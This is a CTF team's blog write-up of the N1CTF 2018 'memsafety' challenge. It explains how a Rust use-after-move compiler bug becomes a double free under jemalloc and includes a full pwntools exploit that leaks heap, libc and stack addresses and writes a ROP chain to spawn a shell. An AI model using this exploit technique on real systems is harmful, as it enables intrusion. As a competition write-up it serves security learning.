

  
    
  


  





  

<!DOCTYPE html>
<html lang="en-us">
  <head>
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="generator" content="Hugo 0.37 with theme Tranquilpeak 0.4.3-BETA">
    <title>N1CTF-2018 memsafety Writeup</title>
    <meta name="author" content="Team-Eur3kA">
    <meta name="keywords" content="N1CTF, N1CTF-2018, writeup">

    <link rel="icon" href="https://Team-Eur3kA.github.io/favicon.png">
    

    
    <meta name="description" content="">
    <meta property="og:description" content="">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="N1CTF-2018 memsafety Writeup">
    <meta property="og:url" content="/2018/03/n1ctf-2018-memsafety-writeup/">
    <meta property="og:site_name" content="Team-Eur3kA Blog">
    <meta name="twitter:card" content="summary">
    <meta name="twitter:title" content="Team-Eur3kA Blog">
    <meta name="twitter:description" content="">
    
    

    
    

    
      <meta property="og:image" content="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif">
    

    
      <meta property="og:image" content="https://www.vectorlogo.zone/logos/rust-lang/rust-lang-card.png">
    
    
      <meta property="og:image" content="//d1u9biwaxjngwg.cloudfront.net/welcome-to-tranquilpeak/city.jpg">
    
    

    

    
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" integrity="sha256-eZrrJcwDc/3uDhsdt61sL2oOBY362qM3lon1gyExkL0=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.css" integrity="sha256-vuXZ9LGmmwtjqFX1F+EKin1ThZMub58gKULUyf0qECk=" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.css" integrity="sha256-SEa4XYAHihTcEP1f5gARTB2K26Uk8PsndQYHQC1f4jU=" crossorigin="anonymous" />
    
    
    <link rel="stylesheet" href="https://Team-Eur3kA.github.io/css/style-jsjn0006wyhpyzivf6yceb31gvpjatbcs3qzjvlumobfnugccvobqwxnnaj8.min.css" />
    
    

    
      
    
    
  </head>

  <body>
    <div id="blog">
      <header id="header" data-behavior="4">
  <i id="btn-open-sidebar" class="fa fa-lg fa-bars"></i>
  <div class="header-title">
    <a class="header-title-link" href="https://Team-Eur3kA.github.io/">Team-Eur3kA Blog</a>
  </div>
  
    
      <a class="header-right-picture "
         href="https://Team-Eur3kA.github.io/#about">
    
    
    
      
        <img class="header-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
      
    
    </a>
  
</header>

      <nav id="sidebar" data-behavior="4">
  <div class="sidebar-container">
    
      <div class="sidebar-profile">
        <a href="https://Team-Eur3kA.github.io/#about">
          <img class="sidebar-profile-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
        </a>
        <h4 class="sidebar-profile-name">Team-Eur3kA</h4>
        
          <h5 class="sidebar-profile-bio">CTF Security Team Eur3kA deriving from former united team FFF-PKyou which consists of members from multiple united team FFF and Peking University team PKyou</h5>
        
      </div>
    
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/">
    
      <i class="sidebar-button-icon fa fa-lg fa-home"></i>
      
      <span class="sidebar-button-desc">Home</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/categories">
    
      <i class="sidebar-button-icon fa fa-lg fa-bookmark"></i>
      
      <span class="sidebar-button-desc">Categories</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/tags">
    
      <i class="sidebar-button-icon fa fa-lg fa-tags"></i>
      
      <span class="sidebar-button-desc">Tags</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/archives">
    
      <i class="sidebar-button-icon fa fa-lg fa-archive"></i>
      
      <span class="sidebar-button-desc">Archives</span>
    </a>
  </li>

  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/#about">
    
      <i class="sidebar-button-icon fa fa-lg fa-question"></i>
      
      <span class="sidebar-button-desc">About</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://github.com/Team-Eur3kA" target="_blank" rel="noopener">
    
      <i class="sidebar-button-icon fa fa-lg fa-github"></i>
      
      <span class="sidebar-button-desc">GitHub</span>
    </a>
  </li>


    </ul>
    <ul class="sidebar-buttons">
      
  <li class="sidebar-button">
    
      <a class="sidebar-button-link " href="https://Team-Eur3kA.github.io/index.xml">
    
      <i class="sidebar-button-icon fa fa-lg fa-rss"></i>
      
      <span class="sidebar-button-desc">RSS</span>
    </a>
  </li>


    </ul>
  </div>
</nav>

      
  <div class="post-header-cover
              text-center
              "
       style="background-image:url('//d1u9biwaxjngwg.cloudfront.net/welcome-to-tranquilpeak/city.jpg')"
       data-behavior="4">
    
      <div class="post-header main-content-wrap text-center">
  
    <h1 class="post-title" itemprop="headline">
      N1CTF-2018 memsafety Writeup
    </h1>
  
  
  <div class="postShorten-meta post-meta">
    
      <time itemprop="datePublished" datetime="2018-03-13T00:00:00Z">
        
  March 13, 2018

      </time>
    
    
  
  
    <span>in</span>
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/n1ctf">N1CTF</a>, 
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/n1ctf-2018">N1CTF-2018</a>, 
    
      <a class="category-link" href="https://Team-Eur3kA.github.io/categories/writeup">writeup</a>
    
  

  </div>

</div>
    
  </div>


      <div id="main" data-behavior="4"
        class="hasCover
               hasCoverMetaIn
               ">
        <article class="post" itemscope itemType="http://schema.org/BlogPosting">
          
          
          <div class="post-content markdown" itemprop="articleBody">
            <div class="main-content-wrap">
              <p></p>

<h1 id="n1ctf-2018-memsafety-writeup">N1CTF 2018 memsafety writeup</h1>

<h2 id="overview">Overview</h2>

<p>Me Anciety played this N1CTF as a member of Team Eur3ka. During the CTF I solved challenge
memsafety and helped my team mate @Neo solved NetworkCard challenge.</p>

<p>This is actually a quite interesting challenge for it uses my favorite <code>Rust</code>!</p>

<p>After unzipping, there is a binary along with a <code>.rs</code> file and a libc.</p>

<pre><code>distrib/
├── libc.so.6
├── main
└── main.rs
</code></pre>

<p>Let&rsquo;s go through the <a href="https://github.com/Team-Eur3kA/n1ctf-2018/blob/master/source/pwn/memsafety/src/main.rs">source code it provided</a>. It is a &ldquo;calculator&rdquo; that is able to accept some commands.</p>

<p>There is 3 kinds of commands, a number, a string or a vector. Vector is in a form like a python list.A global object is there to provide the ability to save the operated number, string or vector. Since we have the source, the logic is not hard to be clear.</p>

<p>Where is the bug? I searched keyword &ldquo;unsafe&rdquo; on my instinct, since it is related to what is unsafe in <code>Rust</code> compiled binary, unfortunately, there is none. This confuses me when there is no such unsafe part, how can it be unsafe? I try to compile my own binary to instrument some <code>println!()</code> to print some information. That&rsquo;s when things are getting better.</p>

<p>When I try to compile it using my <code>1.26 nightly rustc</code>, I get following result:</p>

<pre><code>error[E0382]: use of moved value: `resvec`
   --&gt; main.rs:942:45
    |
864 |                             } else if resvec.unwrap().len() &lt;= 100 {
    |                                       ------ value moved here
...
942 |                                 let mut k = resvec.unwrap();
    |                                             ^^^^^^ value used here after move
    |
    = note: move occurs because `resvec` has type `std::option::Option&lt;std::vec::Vec&lt;i32&gt;&gt;`, which does not implement the `Copy` trait

error: aborting due to previous error

If you want more information on this error, try using &quot;rustc --explain E0382&quot;
</code></pre>

<p>One uses <code>Rust</code> a lot is surely familiar with this bug. Let&rsquo;s stop a little while to understand what the hell is the <code>moved value</code>.</p>

<h2 id="rust-ownership-101">Rust Ownership 101</h2>

<p>Ownership is a very important feature in <code>Rust</code> language. It is the core to <code>Rust</code> memory safety property. So we now know why the challenge is called <code>memsafety</code>.</p>

<p>In <code>Rust</code> language, a &ldquo;variable definition&rdquo; is not actually called that way, it is called &ldquo;binding&rdquo;. So when we &ldquo;define&rdquo; a variable, we are actually &ldquo;binding&rdquo; a name to that value.</p>

<pre><code class="language-Rust">let variable = 20; // This is a variable called &quot;variable&quot; binding to value 20
let variable = 30; // This is not &quot;re-definition&quot; in other language. Just the very same name binds to another value 30
</code></pre>

<p>When we bind a name to a value, this name &ldquo;owns&rdquo; the value. By owning, I mean that it is the owner. What if the owner runs out of scope? Well, it drops!</p>

<p>The &ldquo;assign&rdquo; in <code>Rust</code> is not like normal &ldquo;assign&rdquo;, it also consists of the ownership transition.</p>

<pre><code class="language-Rust">let variable = 20; // &quot;variable&quot; now owns 20
let owner_now = variable; // &quot;assign&quot;, which should be called &quot;move&quot;, the &quot;owner_now&quot; is the owner
println!(&quot;{}&quot;, variable); // XXX This won't compile, since the variable is not the owner now, so we can't use the variable to refer to the value
</code></pre>

<p>If you are familiar with <code>C++</code>, this is much like the &ldquo;move&rdquo; in <code>C++ 11</code>(or 14?).
What we really need to know, is that there is a lifetime of a binding. When the lifetime is out, it will be collected. That is one aspect how <code>Rust</code> achieves <code>zero-cost abstraction</code>.</p>

<h2 id="back-to-our-problem">Back to our problem</h2>

<p>According to the error message before, we know the problem is like we moved a value somewhere, while we are still using it. Think of something? Yup, UAF.</p>

<p>Since a value is moved elsewhere, when that value goes out of scope, it will be collected, but that value is still usable, UAF is very obvious in this way. The &ldquo;<code>Copy</code> trait&rdquo; in the &ldquo;note&rdquo; part of the error message shows that it is no copiable, which means it will not be copied, this ensures the vulnerability.</p>

<h2 id="jemalloc-problem">Jemalloc problem</h2>

<p>By analyze a little bit, we are sure it uses the default <code>jemalloc</code> allocator. I don&rsquo;t know much about this allocator, but my leader @Atum tells me that I can&rsquo;t change the meta-data like we used to do with libc malloc. So how can we use this UAF problem? I wrote a PoC to know that how double free is handled, to our surprise, a mature allocator like this just allows it!</p>

<pre><code class="language-Rust">#![feature(allocator_api)]
#![feature(alloc)]
extern crate alloc;

use alloc::heap::*;

fn main() {
    let layout = Layout::from_size_align(0x100, 8).unwrap();
    let new_layout = Layout::from_size_align(0x104, 8).unwrap();
    let mut heap = Heap::default();
    unsafe {
        let a = heap.alloc(layout.clone()).unwrap();
        println!(&quot;{:?}&quot;, a);
        heap.dealloc(a, layout.clone());
        heap.dealloc(a, layout.clone());
        let a = heap.alloc(layout.clone()).unwrap();
        println!(&quot;{:?}&quot;, a);
        let a = heap.realloc(a, layout.clone(), new_layout).unwrap();
        println!(&quot;{:?}&quot;, a);
        let a = heap.alloc(layout.clone()).unwrap();
        println!(&quot;{:?}&quot;, a);
    }
}
</code></pre>

<p>The output is:</p>

<pre><code>0x7f3ed7815100
0x7f3ed7815100
0x7f3ed782b000
0x7f3ed7815100
</code></pre>

<p>Now we have a thought. We use double free to control some pointer then get a read or write any where.</p>

<h2 id="global-helps">Global helps</h2>

<p>But where to control? Well, we need to find somewhere with a pointer on heap. The final decision is the global. The global has a vector of vector(<code>Vec&lt;Vec&lt;i32&gt;&gt;</code>), so it has to contain a pointer. The source of the vector can be found <a href="https://doc.rust-lang.org/1.20.0/src/alloc/vec.rs.html#11-2598">here</a>, since the type is <code>Vec&lt;Vec&lt;i32&gt;&gt;</code>, when we control the outer vector, the inner vector will be allocated on heap, and we can see the full struct there. So we are able to control the pointer and the length.</p>

<p>Now, the problem is how can we make this to be allocated to where we double freed before, how long will this struct be? A vector structure is 24 bytes long, this can be ensured using runtime debugging methods. Since this global vector can only be extended using <code>.push()</code> method, we need to know how and when it is allocated. By digging a little bit in IDA, we can see that the allocation strategy is that when the space is not enough to hold a new appending object, it doubles it. The discovering of this is left for readers to accomplish.</p>

<p>The first allocation of the vector is defined in the <code>new()</code> part of <code>Global</code>, it uses <code>with_capacity(10)</code> to allocate space for 10 possible elements. When it get doubled, the sizes can be 20 * 24, 40 * 24, 80 * 24 and so on.</p>

<h2 id="exploit-strategy">Exploit strategy</h2>

<p>Final strategy to exploit:
1. use double free bug to get 2 freed regions for later use
2. push vector of different size to global vector, to make it double, then allocate the space where we freed before
3. allocate a large vector of the same size as before, now this will be allocated at the same position of the global vector
4. when we operates on the large vector in step 3, we are actually modifying global vector. Now we get read or write anywhere.
5. use that to leak heap address, and leak some libc address on heap, then leak <code>environ</code> variable in libc to get stack address, finally write to stack to form a ROP chain.
6. exit! ROP chain will then be triggered</p>

<h2 id="final-exploit">Final exploit</h2>

<pre><code class="language-Python">from pwn import *
import os
context(os='linux', arch='amd64', log_level='debug')

DEBUG = False

libc = ELF('./libc.so.6')

if DEBUG:
    p = process('./main', env={'LD_PRELOAD': os.getcwd() + '/libc.so.6'})
else:
    p = remote('47.98.57.30', 4279)
    p.recvuntil('PoW:')
    line = p.recvline()
    output = subprocess.check_output(line, shell=True)
    p.sendline(output)
# libc at heap: 15220

def read_to_vec(idx, idy, idz):
    p.recvuntil('$')
    p.sendline('9')
    p.recvuntil('Index =&gt;')
    p.sendline(str(idx))
    p.recvuntil('Index =&gt;')
    p.sendline(str(idy))
    p.recvuntil('Index =&gt;')
    p.sendline(str(idz))
    
def set_to_global(idx, num):
    p.sendline('7')
    p.recvuntil('Index =&gt;')
    p.sendline(str(idx))
    p.recvuntil('Value =&gt;')
    p.sendline(str(num &amp; 0xffffffff))

def dump_result(idx):
    p.sendline('6')
    p.recvuntil('number')
    p.sendline(str(idx))
    p.recvuntil('Result:')
    result = int(p.recvline().strip('\n'))
    return result

def set_var(var):
    p.recvuntil('$')
    p.sendline('6')
    p.sendline(str(var))

def write_num_to_offset(offset, num):
    set_var(num)
    p.recvuntil('$')
    p.sendline('5')
    p.recvuntil('$')
    p.sendline('9')
    p.recvuntil('Index =&gt; ')
    p.sendline(str(0))
    p.recvuntil('Index =&gt; ')
    p.sendline(str(offset))


def dump_addr(addr):
    set_to_global(0, addr &amp; 0xffffffff)
    set_to_global(1, addr &gt;&gt; 32)
    
    read_to_vec(0, 0, 6)
    read_to_vec(0, 1, 7)

    low = dump_result(6) &amp; 0xffffffff
    high = dump_result(7) &amp; 0xffffffff
    addr = low + (high &lt;&lt; 32)
    return addr



def main():
    if DEBUG:
        raw_input()
    p.recvuntil('&gt;&gt;&gt;')
    p.sendline('[' + '1, ' * 119 + '1]')
    p.recvuntil('$')
    p.sendline('0')
    p.recvuntil('(y/n): ')
    p.sendline('n')
    
    p.recvuntil('&gt;&gt;&gt;')
    p.sendline('[1, 1]')
    for i in range(10):
        log.info('allocating %d' % i)
        p.recvuntil('$')
        p.sendline('4')
    p.sendline('0')
    p.recvuntil('(y/n): ')
    p.sendline('n')

    #p.recvuntil('&gt;&gt;&gt;')
    #p.sendline('&quot;' + 'a' * 110 + '&quot;')
    #p.sendline('0')
    #p.recvuntil('(y/n): ')
    #p.sendline('y')

    p.recvuntil('&gt;&gt;&gt;')
    p.sendline('[' + '1, ' * 119 + '1]')
    p.recvuntil('$')
    p.sendline('5')

    # get heap address
    p.sendline('6')
    p.recvuntil('number:')
    p.sendline('0')
    p.recvuntil('Result:')
    heap_address_low = int(p.recvline().strip('\n'))

    p.sendline('6')
    p.recvuntil('number:')
    p.sendline('1')
    p.recvuntil('Result:')
    heap_address_high = int(p.recvline().strip('\n'))
    heap_address = heap_address_low + (heap_address_high &lt;&lt; 32)
    p.info('heap: ' + hex(heap_address))
    if DEBUG:
        heap_base = heap_address - 0x1f040
    else:
        heap_base = heap_address - 0x14040
    p.info('heap base %x' % heap_base)
    libc_at_heap = heap_base + 0x15220

    #set_to_global(0, libc_at_heap)

    libc_address = dump_addr(libc_at_heap)
    libc_base = libc_address - 0x3c3260
    
    p.info('libc base %x' % libc_base)

    environ_at_libc = libc.symbols['environ'] + libc_base
    p.info('environ at libc %x' % environ_at_libc)
    environ_addr = dump_addr(environ_at_libc)
    
    p.info('environ @ %x' % environ_addr)

    ret_addr = environ_addr - 0x2b0
    sh_addr = libc_base + list(libc.search('sh\x00'))[0]
    pop_rdi = 0x0000000000021102 + libc_base
    system_addr = libc_base + libc.symbols['system']
    
    p.info('writing ret_addr %x' % ret_addr)
    set_to_global(0, ret_addr &amp; 0xffffffff)
    set_to_global(1, ret_addr &gt;&gt; 32)
    # size
    set_to_global(2, 0x10)
    set_to_global(4, 0x10)
    
    p.sendline('0')
    p.recvuntil('(y/n):')
    p.sendline('n')

    p.sendline(str(0x13337))

    p.info('written pop rdi %x @ %x' % (pop_rdi, ret_addr))
    write_num_to_offset(0, pop_rdi &amp; 0xffffffff)
    write_num_to_offset(1, pop_rdi &gt;&gt; 32)

    p.info('written sh_addr %x @ %x' % (sh_addr, ret_addr + 0x8))
    write_num_to_offset(2, sh_addr &amp; 0xffffffff)
    write_num_to_offset(3, sh_addr &gt;&gt; 32)

    p.info('written system_addr %x @ %x' % (system_addr, ret_addr + 0x10))
    write_num_to_offset(4, system_addr &amp; 0xffffffff)
    write_num_to_offset(5, system_addr &gt;&gt; 32)

    p.sendline('0')
    p.recvuntil('(y/n):')
    p.sendline('n')
    p.recvuntil('&gt;&gt;&gt;')
    p.sendline('exit')

    p.interactive()

if __name__ == '__main__':
    main()
</code></pre>

<h2 id="conclusion">Conclusion</h2>

<p><code>Rust</code> is a good language! Learn it and use it insted of <code>C++</code>, you will not regret. The community of <code>Rust</code> is quite active, even uses RFCs to carefully design this beautiful language.</p>

<p>The bug in this challenge is actually a compiler bug in <code>rustc 1.14</code>, it is astonishing how the writer of this challenge discovers and uses it. Will it be further bug in <code>Rust</code> compiler so it may lead to exploitation? We may never know.</p>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/n1ctf/">N1CTF</a>

  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/n1ctf-2018/">N1CTF-2018</a>

  <a class="tag tag--primary tag--small" href="https://Team-Eur3kA.github.io/tags/writeup/">writeup</a>

                  </div>
                
              
            
            
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-network-card-writeup/" data-tooltip="N1CTF 2018 Network Card Writeup">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-7amebox1-writeup/" data-tooltip="CodeGate 2018 7amebox1 Writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
      
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


            
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2018 Team-Eur3kA. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        
  <div class="post-actions-wrap">
      <nav >
        <ul class="post-actions post-action-nav">
          
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-network-card-writeup/" data-tooltip="N1CTF 2018 Network Card Writeup">
              
                  <i class="fa fa-angle-left"></i>
                  <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
                </a>
            </li>
            <li class="post-action">
              
                <a class="post-action-btn btn btn--default tooltip--top" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-7amebox1-writeup/" data-tooltip="CodeGate 2018 7amebox1 Writeup">
              
                  <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
                  <i class="fa fa-angle-right"></i>
                </a>
            </li>
          
        </ul>
      </nav>
    <ul class="post-actions post-action-share" >
      
        <li class="post-action hide-lg hide-md hide-sm">
          <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
            <i class="fa fa-share-alt"></i>
          </a>
        </li>
        
      
      
      <li class="post-action">
        
          <a class="post-action-btn btn btn--default" href="#">
        
          <i class="fa fa-list"></i>
        </a>
      </li>
    </ul>
  </div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <i id="btn-close-shareoptions" class="fa fa-close"></i>
  <ul class="share-options">
    
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="https://farscapedevelopment.files.wordpress.com/2012/07/eureka.gif" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Team-Eur3kA</h4>
    
      <div id="about-card-bio">CTF Security Team Eur3kA deriving from former united team FFF-PKyou which consists of members from multiple united team FFF and Peking University team PKyou</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Security Team
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        China
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" rel="noopener" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-network-card-writeup/">
                <h3 class="media-heading">N1CTF 2018 Network Card Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather">Hi, I&rsquo;m Ne0. Last weekend we Eur3kA played Nu1L CTF 2018 and won the champion. Thanks all my strong teammates. This kernel pwn challenge is not very difficult but kind of tricky. Thanks @Anciety&rsquo;s help.
Challenge info The challenge files includes the following:
➜ network_card ls bzImage initramfs.img nu1l.ko startvm.sh  Obviously we should focus on nu1l.ko. Take a look at the startvm.sh and we will find that we have to bypass kaslr,smep and smap to solve this challenge.</div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/03/n1ctf-2018-memsafety-writeup/">
                <h3 class="media-heading">N1CTF-2018 memsafety Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Mar 3, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-7amebox1-writeup/">
                <h3 class="media-heading">CodeGate 2018 7amebox1 Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/codegate-2018-web-writeup/">
                <h3 class="media-heading">CodeGate 2018 Web Writeup</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://Team-Eur3kA.github.io/2018/02/welcome-to-team-eur3ka-site/">
                <h3 class="media-heading">Welcome to Team Eur3kA site</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Feb 2, 2018
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Welcome a lot to visit Team Eur3kA offitial site.
</p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         5 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://Team-Eur3kA.github.io/images/cover.jpg');"></div>
  


    
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha256-BbhdlvQf/xTY9gja0Dq3HiwQF8LaCRTXxZKRutelT44=" crossorigin="anonymous"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js" integrity="sha256-/BfiIkHlHoVihZdc6TFuj7MmJ0TWcWsMXkeDFwhi0zw=" crossorigin="anonymous"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.7/js/jquery.fancybox.min.js" integrity="sha256-GEAnjcTqVP+vBp3SSc8bEDQqvWAZMiHyUSIorrWwH50=" crossorigin="anonymous"></script>


<script src="https://Team-Eur3kA.github.io/js/script-qi9wbxp2ya2j6p7wx1i6tgavftewndznf4v0hy2gvivk1rxgc3lm7njqb6bz.min.js"></script>



<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight > code, pre > code').each(function(i, block) {
    if (!$(this).hasClass('codeblock')) {
      $(this).addClass('codeblock');
    }
    hljs.highlightBlock(block);
  });
});
</script>


  
    
  



    
  </body>
</html>

